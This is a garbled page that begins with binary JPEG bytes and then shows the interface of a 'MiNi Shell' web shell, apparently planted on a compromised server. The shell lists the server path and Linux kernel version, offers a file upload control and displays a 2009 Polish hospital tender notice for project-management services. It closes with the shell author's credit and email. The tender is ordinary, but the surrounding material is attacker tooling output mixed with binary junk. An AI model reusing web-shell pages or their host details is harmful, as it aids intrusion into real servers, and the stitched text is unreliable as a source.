JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090916/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090916/320808-N-2009.html

<p class="kh_header"><b>Proszowice: wykonywanie usługi inwestora zastępczego oraz zarządzania Projektem przy realizacji dobudowy bloku operacyjnego i centralnej sterylizatorni oraz ich technologicznego wyposażenia w SP ZOZ w Proszowicach przy ul. Kopernika 13 w ramach projektu Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013 Poprawa bezpieczeństwa mieszkańców, w tym socjalnego i zdrowotnego</b><br>
<b>Numer ogłoszenia: 320808 - 2009; data zamieszczenia: 16.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. Kopernika 13, 32-100 Proszowice, woj. małopolskie, tel. 012 3865105, faks 012 3865258.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonywanie usługi inwestora zastępczego oraz zarządzania Projektem przy realizacji dobudowy bloku operacyjnego i centralnej sterylizatorni oraz ich technologicznego wyposażenia w SP ZOZ w Proszowicach przy ul. Kopernika 13 w ramach projektu Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013 Poprawa bezpieczeństwa mieszkańców, w tym socjalnego i zdrowotnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usługi inwestora zastępczego oraz zarządzania Projektem przy realizacji dobudowy bloku operacyjnego i centralnej sterylizatorni oraz ich technologicznego wyposażenia w SP ZOZ w Proszowicach przy ul. Kopernika 13 w ramach projektu Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013 Poprawa bezpieczeństwa mieszkańców, w tym socjalnego i zdrowotnego
Realizacja usługi będzie obejmować:
	wdrażanie i realizowanie projektu zgodnie z jego celem, w oparciu o harmonogram, wymogi MRPO i przepisy prawa,
	czuwanie nad właściwym przebiegiem realizacji projektu,
	weryfikacja dokumentacji z realizacji projektu,
	terminowe sporządzanie sprawozdań,
	nadzór nad prawidłową realizacją projektu,
	kontakt z Instytucją Zarządzającą,
	przygotowywanie i przeprowadzanie postępowań o zamówienie publiczne zgodnie z ustawą Pzp,
	wykonywanie nadzoru budowlanego w specjalnościach: konstrukcyjno-budowlanej, instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wod-kan oraz elektrycznych,
	organizowanie i uczestniczenie w naradach koordynacyjnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 75.11.21.00-5, 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu może wziąć udział wykonawca, który:
1)	uczestniczył w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia w realizacji co najmniej dwóch projektów finansowanych z udziałem środków UE lub podobnych np. pochodzących z funduszy norweskich,
2)	wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej 5 usług, polegających na przygotowaniu i przeprowadzeniu postępowań o udzielenie zamówień publicznych,
3)	wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej 1 usługę, polegającą na wykonaniu nadzoru inwestorskiego,
4)	dysponuje lub będzie dysponował co najmniej trzema osobami posiadającymi uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej, instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wod-kan oraz elektrycznych,
5)	dysponuje lub będzie dysponował co najmniej trzema osobami posiadającymi kwalifikacje niezbędne do wykonania zamówienia w tym co najmniej jedną osobą posiadającą wykształcenie prawnicze, 
Uwaga: osoba posiadająca kwalifikacje to osoba posiadająca: wykształcenie wyższe, oraz doświadczenie w realizacji projektów,
6)	spełnia pozostałe warunki, o których mowa w art. 22 ust. 1 ustawy, w tym nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Ad. 1 ocena spełniania przez Wykonawcę warunku udziału w postępowaniu, o którym mowa w pkt 1 ogłoszenia, będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 3 i 4; z wykazu powinno wynikać, że Wykonawca uczestniczył w realizacji co najmniej 2 projektów finansowanych z udziałem środków unijnych lub podobnych np. z funduszy norweskich; dokumenty, o których mowa w pkt 4 powinny potwierdzać, że usługi zawarte w wykazie zostały wykonane należycie,
Ad. 2 ocena spełniania przez Wykonawcę warunku udziału w postępowaniu, o którym mowa w pkt 2 ogłoszenia, będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 7 i 8, z wykazu powinno wynikać, że Wykonawca wykonał w okresie ostatnich trzech lat, co najmniej 5 usług polegających na przygotowaniu i przeprowadzeniu postępowań o udzielenie zamówień publicznych; dokumenty, o których mowa w pkt 8 powinny potwierdzać, że usługi zawarte w wykazie zostały wykonane należycie,
Ad. 3 ocena spełniania przez Wykonawcę warunku udziału w postępowaniu, o którym mowa w pkt 3 ogłoszenia, będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 12 i 13; z wykazu powinno wynikać, że Wykonawca wykonał co najmniej 1 usługę polegającą na wykonaniu nadzoru inwestorskiego; dokumenty, o których mowa w pkt 13 powinny potwierdzać, że usługi zawarte w wykazie zostały wykonane należycie,
Ad. 4 ocena spełniania przez Wykonawcę warunku, opisanego w pkt 4 ogłoszenia:
-	w przypadku dysponowania osobami przez Wykonawcę ocena będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 9 i 11 ogłoszenia - z wykazu, o którym mowa w części V pkt 9 powinno wynikać, że w specjalnościach wymienionych w pkt 4, Wykonawca dysponuje osobami posiadającymi uprawnienia budowlane; dokumenty, o których mowa w części V pkt 11, powinny potwierdzać, że osoby wykazane w wykazie posiadają uprawnienia budowlane do kierowania robotami w specjalnościach określonych w pkt 4,
-	w przypadku kiedy Wykonawca będzie dysponował osobami, ocena będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 9, 10 i 11 ogłoszenia - Wykonawca oprócz dokumentów, o których mowa w pkt 9 i 11 będzie obowiązany dołączyć pisemne zobowiązanie (zobowiązania) innych podmiotów do udostępnienia osoby lub osób posiadających uprawnienia budowlane w specjalnościach określonych w pkt 4,
Ad. 5 ocena spełniania przez Wykonawcę warunku udziału w postępowaniu, o którym mowa w pkt 5 ogłoszenia będzie dokonana:
-	w przypadku dysponowania co najmniej trzema osobami ocena będzie dokonana na podstawie dokumentu, o którym mowa w części V pkt 5 - z wykazu, o którym mowa powinno wynikać, że Wykonawca dysponuje co najmniej trzema osobami posiadającymi kwalifikacje, o których mowa w pkt 5; 
-	w przypadku kiedy Wykonawca będzie dysponował osobami na podstawie dokumentów, o których mowa w części V pkt  5 i 6 - Wykonawca oprócz wykazu, o którym mowa w pkt 5 będzie obowiązany dołączyć pisemne zobowiązanie (zobowiązania) innych podmiotów do udostępnienia osoby lub osób posiadających kwalifikacje określonych w pkt 5; 
Ad. 6 ocena spełniania pozostałych warunków, o których mowa w pkt 6 ogłoszenia, będzie dokonana na podstawie dokumentu, o którym mowa w części V pkt 2 ogłoszenia oraz oświadczenia, o którym mowa w części V pkt 1 (Załącznik 2 do SIWZ) - z dokumentu oraz oświadczenia powinno wynikać, że Wykonawca spełnia pozostałe warunki, o których mowa w art. 22 ust. 1 ustawy, w tym nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca powinien złożyć następujące oświadczenia i dokumenty:
1)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik 2 do SIWZ),
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3)	wykaz wykonanych w ciągu ostatnich trzech lat usług, o których mowa w części IV pkt 1 wraz z podaniem programu, w których Wykonawca uczestniczył w realizacji, dat oraz odbiorców (Załącznik 3 do SIWZ), podpisany przez osoby upoważnione, 
4)	co najmniej 2 dokumenty (referencje, listy referencyjne lub dokumenty o podobnym charakterze), potwierdzające że usługi wykazane w wykazie, o którym mowa w pkt 3, zostały wykonane należycie,
5)	wykaz zawierający osoby, którymi Wykonawca dysponuje lub będzie dysponował, a które będą wykonywać zamówienie, posiadające kwalifikacje, o których mowa w części IV pkt 5 (Załącznik 4 do SIWZ),
6)	pisemne zobowiązania innych podmiotów do udostępnienia osoby lub osób posiadających kwalifikacje, o których mowa w części IV pkt 5, jeżeli w wykazie, o którym mowa w pkt 5, Wykonawca wskazał osobę lub osoby, którymi będzie dysponował, 
7)	wykaz wykonanych w ciągu ostatnich trzech lat co najmniej 5 usług, polegających na przygotowaniu i przeprowadzeniu postępowań o udzielenie zamówień publicznych (Załącznik 5 do SIWZ), podpisany przez osoby upoważnione zawierający przedmiot, daty oraz odbiorców,
8)	co najmniej 5 dokumentów (referencje, listy referencyjne lub dokumenty o podobnym charakterze) potwierdzające, że usługi, o których mowa w pkt 7 zostały wykonane należycie,
9)	wykaz zawierający osoby, którymi Wykonawca dysponuje lub będzie dysponował, a które będą wykonywać zamówienie, posiadające uprawnienia budowlane do kierowania robotami w specjalnościach, o których mowa w części IV pkt 4,
10)	pisemne zobowiązania innych podmiotów do udostępnienia osoby lub osób posiadających uprawnienia, o których mowa w części IV pkt 4, jeżeli w wykazie, o którym mowa w pkt 9, Wykonawca wskazał osobę lub osoby, którymi będzie dysponował, 
11)	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, wykazane w wykazie, o którym mowa w pkt 9, posiadają uprawnienia do kierowania robotami budowlanymi, o których mowa w części IV pkt 4,
12)	wykaz wykonanych w ciągu ostatnich trzech lat usług, o których mowa w części IV pkt 3, które Wykonawca wykonał: wykaz powinien zawierać daty, przedmiot oraz odbiorców (Załącznik 8 do SIWZ), podpisany przez osoby upoważnione,
13)	co najmniej 1 dokument (referencje, listy referencyjne lub dokumenty o podobnym charakterze) potwierdzające, że usługi, o których mowa w pkt 12 zostały wykonane należycie,

UWAGA 1. 	Dokumenty, o których mowa w pkt 2, 4, 6, 8, 10, 11 i 13 mogą być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę, tzn. przez osoby podpisujące ofertę lub przez osoby upoważnione do poświadczenia zgodności z oryginałem kserokopii dokumentów - w takim przypadku wraz z dokumentami Wykonawca powinien przedłożyć dokumenty, z treści których wynika umocowanie do dokonania tej czynności, o ile nie wynika ono z innych dokumentów składanych wraz z ofertą. W przypadku, gdy dokument składa się z więcej niż jednej strony, kserokopia każdej strony powinna być poświadczona za zgodność z oryginałem w sposób opisany wyżej.
UWAGA 2. 	Oświadczenie, o którym mowa w pkt. 1 oraz wykazy, o których mowa w pkt 3, 5, 7, 9 i 12 powinny być podpisane przez osoby podpisujące ofertę.
UWAGA 3. 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt. 1, w zakresie niepodlegania wykluczeniu z postępowania, oraz dokument, o którym mowa w pkt 2 powinien złożyć każdy z Wykonawców.
UWAGA 4. 	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt  2 składa dokument, wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
Dokument, o których mowa wyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
UWAGA 5. 	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w uwadze 4 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
UWAGA 6. 	Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzoz.proszowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Proszowicach, 32-100 Proszowice, ul. Kopernika 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Opieki Zdrowotnej w Proszowicach, 32-100 Proszowice, ul. Kopernika 13 I piętro (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com